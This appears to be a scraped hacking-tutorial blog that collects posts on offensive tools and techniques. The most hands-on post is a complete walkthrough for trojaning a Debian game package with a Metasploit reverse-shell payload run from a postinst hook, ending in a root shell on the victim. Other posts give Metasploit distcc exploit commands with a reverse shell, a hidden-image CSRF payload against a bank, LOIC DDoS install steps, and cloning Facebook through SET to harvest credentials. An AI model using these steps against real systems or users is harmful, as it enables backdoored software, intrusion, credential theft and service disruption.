WebSploit Framework : java applet attack

WebSploit Is An Open Source Project For :

Social Engineering Works
Scan,Crawler & Analysis Web
Automatic Exploiter
Support Network Attacks
Autopwn - Used From Metasploit For Scan and Exploit Target Service
wmap - Scan,Crawler Target Used From Metasploit wmap plugin
format infector - inject reverse & bind payload into file format
phpmyadmin Scanner
CloudFlare resolver
LFI Bypasser
Apache Users Scanner
Dir Bruter
admin finder
MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
MITM - Man In The Middle Attack
Java Applet Attack
MFOD Attack Vector
USB Infection Attack
ARP Dos Attack
Web Killer Attack
Fake Update Attack
Fake Access point Attack
Wifi Honeypot
Wifi Jammer
Wifi Dos
Bluetooth POD Attack

The Java Applet Attack considers as one of the most successful and popular methods for compromising a system.Popular because we can create the infected Java applet very easily,we can clone any site we want that will load the applet very fast

The Java applet Attack vector affects:

• Windows Systems
• Linux Systems and
• Mac OS X 

Click here to Download WebSploit Framework 

Zip File Password Cracker Python Script

Today we will create python script to crack zip-file password. This script use dictionary attack for Crack Password.

Click Here to Download Zip File Password Cracker Python Script 

keimpx – SMB Credential Scanner

keimpx is an open source tool, released under a modified version of Apache License 1.1. It can be used to quickly check for the usefulness of credentials across a network over SMB. Credentials can be:

1. Combination of user / plain-text password.
2. Combination of user / NTLM hash.
3. Combination of user / NTLM logon session token.

If any valid credentials has been discovered across the network after its attack phase, the user is asked to choose which host to connect to and which valid credentials to use, then he will be prompted with an interactive SMB shell where the user can:

1. Spawn an interactive command prompt.
2. Navigate through the remote SMB shares: list, upload, download files, create, remove files, etc.
3. Deploy and undeploy his own service, for instance, a backdoor listening on a TCP port for incoming connections.
4. List users details, domains and password policy.

Download : Keimpx - SMB Credential Scanner

Finding out GeoLocation of IP Address using NMAP

Tries to identify the physical location of an IP address using the Geobytes geolocation web service.

Download Script

Usage

nmap --script ip-geolocation-geobytes <target>

Output

| ip-geolocation-geobytes:
|   latitude: 43.667
|   longitude: -79.417
|   city: Toronto
|   region: Ontario
|_  country: Canada

VIDEO :

SSLsplit v 0.4.5 - Man-in-the-middle attacks against SSL/TLS

A new tool presented at the Black Hat DC 2009 conference by Moxie Marlinspike proves to be a formidable foe against secure login schemes. Always trying to stay on top of the game, Click Death Squad decides to give this tool a whirl and see what the buzz is all about. This attack is particularly crafty because it acts as a Man in the Middle, keeping an eye on HTTPS requests and then mapping them to HTTP look alike setups. If a person were operating on a wireless access point that had been broken into, the results can be devastating. You have a box running sslstrip which has port forwarding enabled and is actively spoofing ARP on a LAN. This computer is the jump off point, which will fake out the wireless router into redirecting HTTPS requests, modifying them and passing them on to the victim. Features include a fake "lock" icon and selective logging capabilities, which provide great flexibility when sniffing traffic. The example we use shows how a MySpace "secure" login can be easily captured using this attack. Props to Moxie Marlinspike for making this tool available to the public.

    Add support for 2048 and 4096 bit Diffie-Hellman
    Fix syslog error messages
    Fix threading issues in daemon mode .
    Fix address family check in netfilter NAT lookup
    Fix build on recent glibc systems
    Minor code and build process improvements

Download SSLsplit v 0.4.5

VIDEO :

Binary Linux Trojan

Binary Linux Trojan

Binary Linux Trojan is  not exclusive to the Windows world, we will package a Metasploit payload in with an Ubuntu deb package to give us a shell on Linux. An excellent video was made by Redmeat_uk demonstrating this technique that you can view at http://securitytube.net/Ubuntu-Package-Backdoor-using-a-Metasploit-Payload-video.aspx

We first need to download the package that we are going to infect and move it to a temporary working directory. In our example, we will use the package 'freesweep', a text-based version of Mine Sweeper.

root@kali:~# apt-get --download-only install freesweep
Reading package lists... Done
Building dependency tree
Reading state information... Done
...snip...
root@kali:~# mkdir /tmp/evil
root@kali:~# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil
root@kali:~# cd /tmp/evil/
root@kali:/tmp/evil#

Next, we need to extract the package to a working directory and create a DEBIAN directory to hold our additional added "features".

root@kali:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work
root@kali:/tmp/evil# mkdir work/DEBIAN

In the 'DEBIAN' directory, create a file named 'control' that contains the following:

root@kali:/tmp/evil/work/DEBIAN# nano control

Package: freesweep
Version: 0.90-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper

We also need to create a post-installation script that will execute our binary. In our 'DEBIAN', we'll create a file named 'postinst' that contains the following:

root@kali:/tmp/evil/work/DEBIAN# cat postinst

#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &

Now we'll create our malicious payload. We'll be creating a reverse shell to connect back to us named 'freesweep_scores'.

root@kali:~# msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.105 LPORT=443 X > /tmp/evil/work/usr/games/freesweep_scores
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/reverse_tcp
Length: 50
Options: LHOST=192.168.1.101,LPORT=443

We'll now make our post-installation script executable and build our new package. The built file will be named 'work.deb' so we will want to change that to 'freesweep.deb' and copy the package to our web root directory.

root@kali:/tmp/evil/work/DEBIAN# chmod 755 postinst
root@kali:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work
dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'.
root@kali:/tmp/evil# mv work.deb freesweep.deb
root@kali:/tmp/evil# cp freesweep.deb /var/www/

If it is not already running, we'll need to start the Apache web server.

root@kali:/tmp/evil# service apache2 start

We will need to set up the Metasploit multi/handler to receive the incoming connection.

root@kali:~# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.1.105 LPORT=443 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

On our Ubuntu victim, we have somehow convinced the user to download and install our awesome new game.

ubuntu@ubuntu:~$ wget http://192.168.1.105/freesweep.deb

ubuntu@ubuntu:~$ sudo dpkg -i freesweep.deb

As the victim installs and plays our game, we have received a shell!

[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129)

ifconfig
eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6
inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:49 errors:0 dropped:0 overruns:0 frame:0
TX packets:51 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB)
Interrupt:17 Base address:0x1400
...snip...

hostname
ubuntu
id
uid=0(root) gid=0(root) groups=0(root)

Golismero.py Web tool in BackTrack 5 R3

What is GoLISMERO?

GoLISMERO is a web spider is able to detect vulnerabilities and format results a very useful when starting a web audit.

It's for?

GoLISMERO is intended to be a first step when starting a web security audit.

Every time we face a new URL, would not it be great to have easily and quick all the links, forms with parameters, to detect possible URL vulnerable and in addition to being presented so that gives us an idea of ​​all points of entry where we could launch attacks? GoLISMERO lets us do all this.

Click Here to Watch Video[Tutorial]

Learning with examples

Remember: For execute GoLismero you need python 2.7.X or abobe.

Below are several examples and case studies, which are the best way to learn to use a security tool.

1. Getting all links and forms from a web, with all its parameters, extended format:

GoLISMERO.py –t google.com

1. Getting all links, on compact mode, and colorize output:

GoLISMERO.py –c –m –t google.com

1. Getting only links. Removing css, javascript, images and mails:

GoLISMERO.py --no-css--no-script --no-images --no-mail –c –A links –m –t google.com

Or, reduced format:

GoLISMERO.py –na –c –A links –m –t google.com

1. Getting only links with params and follow redirects (HTTP 302) and export results in HTML:

GoLISMERO.py –c –A links --follow –F html –o results.html –m –t google.com



And HTML generated code:

1. Getting all links, looking for potentially vulnerable URL and using an intermediate proxy to analyze responses. The URLs or vulnerable parameters are highlighted in red.

GoLISMERO.py –c –A links --follow -na –x –m –t terra.com



Check as ZAP Proxy capture request:



VIDEO :

How to Recover Deleted Files From Pendrive

Introduction

• fatback is a tool in Backtrack 5 which is used to recover the deleted files from FAT(file Allocation Table ) file system.


• Here fatback first read the FAT image file system then it will recovered all deleted file .


• This tool was developed in  year 2000-2001 at DoD (Department of Defence ) Computer Forensic Lab by SrA Nicholas Harbour.


• fatback  is also  useful  for investigation windows filesystem .

VIDEO :

Dorking with Fimap in BackTrack 5 R3

fimap is a little python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It's currently under heavy development but it's usable.

The goal of fimap is to improve the quality and security of your website.

Quick News for SVN and upcoming versions

• Bing searching module implemented in SVN! Currently broken :-O


• SSH-Logfiles can now be scanned and exploited through SSH username!


• You can now define which target to exploit and execute shell commands without the interactive exploit interface! (FimapNonInteractiveExec)


• New experimental fallback plugin which you can try when just /etc/passwd (or any other only-readable file was found. (FimapPhpInfoExploit)


• New fallback plugin for windows victims! (FimapFindFirstFileExploit)

what works currently?

• Check a Single URL, List of URLs, or Google results fully automaticly.


• Can identify and exploit file inclusion bugs.
  
  
  
  • Relative\Absolute Path Handling.
  
  
  • Tries automaticly to eleminate suffixes with Nullbyte and other methods like Dot-Truncation.
  
  
  • Remotefile Injection.
  
  
  • Logfile Injection. (FimapLogInjection)
  
  
  
  


• Test and exploit multiple bugs:
  
  
  
  • include()
  
  
  • include_once()
  
  
  • require()
  
  
  • require_once()
  
  
  
  


• You always define absolute pathnames in the configs. No monkey like redundant pathes like:
  
  
  
  • ../etc/passwd
  
  
  • ../../etc/passwd
  
  
  • ../../../etc/passwd
  
  
  
  


• Has a Blind Mode (--enable-blind) for cases when the server has disabled error messages. BlindMode


• Has an interactive exploit mode which...
  
  
  
  • ...can spawn a shell on vulnerable systems.
  
  
  • ...can spawn a reverse shell on vulnerable systems.
  
  
  • ...can do everything you have added in your payload-dict inside the config.py
  
  
  
  


• Add your own payloads and pathes to the config.py file.


• Has a Harvest mode which can collect URLs from a given domain for later pentesting.


• Goto FimapHelpPage for all features.


• Works also on windows.


• Can handle directories in RFI mode like:
  
  
  
  • <? include ($_GET["inc"] . "/content/index.html"); ?>
  
  
  • <? include ($_GET["inc"] . "_lang/index.html"); ?>
  
  
  • where Null-Byte is not possible.
  
  
  
  


• Can use proxys.


• Scans and exploits GET, POST and Cookies.


• Has a very small footprint. (No senseless bruteforcing of pathes - unless you need it.)


• Can attack also windows servers! (WindowsAttack)


• Has a tiny plugin interface for writing exploitmode plugins (PluginDevelopment)
  
  
  
  • Check out the PHPInfo() Exploit plugin: FimapPhpInfoExploit
  
  
  
  


• Non Interactive Exploiting (FimapNonInteractiveExec)

what doesn't work yet?

• Other languages than PHP (even if engine is ready for others as well.)

VIDEO :

Python Reverse shell

simple reverse shell written in Python (BSIDESLV and Defcon 20 Demo)

Download Python Reverse shell - http://adf.ly/LVvor

VIDEO :

Cross Site Request Forgery Vulnerability

Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.

Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into loading a page that contains a malicious request. It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf, like change the victim's e-mail address, home address, or password, or purchase something. CSRF attacks generally target functions that cause a state change on the server but can also be used to access sensitive data.

For most sites, browsers will automatically include with such requests any credentials associated with the site, such as the user's session cookie, basic auth credentials, IP address, Windows domain credentials, etc. Therefore, if the user is currently authenticated to the site, the site will have no way to distinguish this from a legitimate user request.

In this way, the attacker can make the victim perform actions that they didn't intend to, such as logout, purchase item, change account information, retrieve account information, or any other function provided by the vulnerable website.

Sometimes, it is possible to store the CSRF attack on the vulnerable site itself. Such vulnerabilities are called Stored CSRF flaws. This can be accomplished by simply storing an IMG or IFRAME tag in a field that accepts HTML, or by a more complex cross-site scripting attack. If the attack can store a CSRF attack in the site, the severity of the attack is amplified. In particular, the likelihood is increased because the victim is more likely to view the page containing the attack than some random page on the Internet. The likelihood is also increased because the victim is sure to be authenticated to the site already.

Synonyms: CSRF attacks are also known by a number of other names, including XSRF, "Sea Surf", Session Riding, Cross-Site Reference Forgery, Hostile Linking. Microsoft refers to this type of attack as a One-Click attack in their threat modeling process and many places in their online documentation.

Prevention measures that do NOT work

Using a secret cookie

Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request.

Only accepting POST requests

Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted in attacker's website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim who thinks form will do something else.

Examples

How does the attack work?

There are numerous ways in which an end-user can be tricked into loading information from or submitting information to a web application. In order to execute an attack, we must first understand how to generate a malicious request for our victim to execute. Let us consider the following example: Alice wishes to transfer $100 to Bob using bank.com. The request generated by Alice will look similar to the following:

POST http://bank.com/transfer.do HTTP/1.1
...
...
...
Content-Length: 19;

acct=BOB&amount=100

However, Maria notices that the same web application will execute the same transfer using URL parameters as follows:

GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1

Maria now decides to exploit this web application vulnerability using Alice as her victim. Maria first constructs the following URL which will transfer $100,000 from Alice's account to her account:

http://bank.com/transfer.do?acct=MARIA&amount=100000

Now that her malicious request is generated, Maria must trick Alice into submitting the request. The most basic method is to send Alice an HTML email containing the following:

<a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a>

Assuming Alice is authenticated with the application when she clicks the link, the transfer of $100,000 to Maria's account will occur. However, Maria realizes that if Alice clicks the link, then Alice will notice that a transfer has occurred. Therefore, Maria decides to hide the attack in a zero-byte image:

<img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0">

If this image tag were included in the email, Alice would only see a little box indicating that the browser could not render the image. However, the browser will still submit the request to bank.com without any visual indication that the transfer has taken place.

Related Attacks

• Cross-site Scripting (XSS)


• Cross Site History Manipulation (XSHM)

Related Controls

• Add a per-request nonce to URL and all forms in addition to the standard session. This is also referred to as "form keys". Many frameworks (ex, Drupal.org 4.7.4+) either have or are starting to include this type of protection "built-in" to every form so the programmer does not need to code this protection manually.


• TBD: Add a per-session nonce to URL and all forms


• TBD: Add a hash(session id, function name, server-side secret) to URL and all forms


• TBD: .NET - add session identifier to ViewState with MAC


• Checking the referrer in the client's HTTP request will prevent CSRF attacks. By ensuring the HTTP request have come from the original site means that the attacks from other sites will not function. It is very common to see referrer checks used on embedded network hardware due to memory limitations. XSS can be used to bypass both referrer and token based checks simultaneously. For instance the Sammy Worm used an XHR to obtain the CSRF token to forge requests.


• "Although cross-site request forgery is fundamentally a problem with the web application, not the user, users can help protect their accounts at poorly designed sites by logging off the site before visiting another, or clearing their browser's cookies at the end of each browser session." -http://en.wikipedia.org/wiki/Cross-site_request_forgery#_note-1


• Tokenizing

VIDEO :

HTTP SSL Certificate Information using Metasploit Auxiliary module

Parse the server SSL certificate to obtain the common name and signature algorithm

Rank

- Normal

Authors

• et < et [at] metasploit.com >


• Chris John Riley < >


• Veit Hailperin < hailperv [at] gmail.com >

msf > use auxiliary/scanner/http/ssl
msf auxiliary(ssl) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(ssl) > run

Source Code : http://adf.ly/LL7LN

 VIDEO :

 

DistCC Daemon Command Execution

This Metasploit exploit uses a documented security weakness to execute arbitrary commands on any system running distccd.

distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.
Exploit RanK - Excellent
Cvss Score - 9.3

Commands :

msfconsole

msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show payloads
msf exploit(distcc_exec) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(distcc_exec) > set LHOST [MY IP ADDRESS]
msf exploit(distcc_exec) > set RHOST [TARGET IP]
msf exploit(distcc_exec) > exploit

VIDEO

Vulnerability Scanner uniscan.pl in Backtrack 5 R3

The Uniscan is a vulnerability scanner for Web applications, written in perl for Linux environment. It was developed as conclusion work of the computer science course of Federal University of Pampa and is licensed under the GNU GENERAL PUBLIC LICENSE 3.0 (GPL 3).

Features Of Uniscan:

• Identification of system pages through a Web Crawler.


• Use of threads in the crawler.


• Control the maximum number of requests the crawler.


• Control of variation of system pages identified by Web Crawler.


• Control of file extensions that are ignored.


• Test of pages found via the GET method.


• Test the forms found via the POST method.


• Support for SSL requests (HTTPS).


• Proxy support.


• Generate site list using Google.


• Generate site list using Bing.


• Plug-in support for Crawler.


• Plug-in support for dynamic tests.


• Plug-in support for static tests.


• Plug-in support for stress tests.


• Multi-language support.


• Web client.


• GUI client written in perl using tk.

For Use :

perl ./uniscan.pl -u http://www.targetsite.com/ -qweds

perl ./uniscan.pl -f sites.txt -bqweds

perl ./uniscan.pl -i uniscan

perl ./uniscan.pl -i xxx.xxx.xxx.xxx

perl ./uniscan.pl -u https://www.targetsite.com/ -r

VIDEO

How to lock and unlock folder in remote victim pc using metasploit

lock and unlock folder :

Once you got the meterpreter session use ‘shell‘command to get command prompt of  the target.
Type Cacls (Folder Name) /e /p everyone:n and press Enter.

VIDEO

How To Use Credential Harvester Attack Method Over Internet

The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.


Tools : SET TOOL KIT


OS : Backtrack 5

The credential harvester attack method is used when you don’t want to specifically get a shell but perform phishing attacks in order to obtain username and passwords from the system. In this attack vector, a website will be cloned, and when the victim enters in their user credentials, the usernames and passwords will be posted back to your machine and the victim will be redirected back to the legitimate site.

TUTORIAL VIDEO :

Windows Gather USB Drive History Metasploit Module

This module will enumerate USB Drive history on a target host.

Usage Information

msf > use post/windows/gather/usb_history
msf post(usb_history) > set SESSION [INTEGER]

Module Options

SESSION	The session to run this module on.
VERBOSE	Enable detailed status messages
WORKSPACE	Specify the workspace for this module

How to install LOIC(Low Orbit Ion Cannon) in Backtrack 5 R3

LOIC performs a denial-of-service (DoS) attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP packets or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.

Install LOIC :

1 - aptitude install git-core monodevelop

2 - Download loic.sh script wget https://raw.github.com/nicolargo/loicinstaller/master/loic.sh

3 - Make Folder - mkdir <folder name>

4 - install - ./loic.sh install

5 - update - ./loic.sh update

6 - Run loic - ./loic.sh run

How to share folder in Backtrack 5 R3 to make accessible in Windows

1. Open your terminal (CTRL+ALT+T) and then run this command to create a new directory "share".

mkdir /var/www/share 

2. Change mode for the share folder into 755.

chmod -R 755 /var/www/share/ 


3. Change the ownership of that folder into www-data.

chown -R www-data:www-data /var/www/share/

5. Okay, everything we've set up correctly until this step. The next step is activate the apache server by running the service apache2 start command :

root@bt:~# service apache2 start 
* Starting web server apache2

if you didn't have apache2 installed, run
apt-get install apache2 command

Web Jacking Attack

 

The Web Jacking Attack Vector is another phishing technique that can be used in social engineering engagements.Attackers that are using this method are creating a fake website and when the victim opens the link a page appears with the message that the website has moved and they need to click another link.If the victim clicks the link that looks real he will redirected to a fake page.


The social engineering toolkit has already import this kind of attack.So we are going to use the SET in order to implement this method.We are opening SET and we select the option 2 which is the Website Attack Vectors.

We will see a list with the available web attack methods.The attack that we are going to use is of course the Web Jacking Attack so we select option number 6.

In the next menu we have 3 options:

•     Web Templates


•     Site Cloner


•     Custom Import

We will select the site cloner in order to clone the website of our interest.Remember that this type of attack works with the credential harvester method so we need to choose a website that it has username and password fields in order the attack to have success.For this scenario as you can see in the image below we have select to clone Facebook because of its popularity.

Now it is time to send our the link with our IP address to the victim.Lets see what the victim will see if he opens the link.

As you can see a message will appear informing the user that the website has moved to a new location.The link on the message seems valid so any unsuspicious users will click on the link.At that time a new page will load into the victim’s browser which it will be fake and is running on our web server.

If the victim enters his credentials into the fake Facebook page that looks like the real one then we will be able to capture his username and password.The next image is showing that: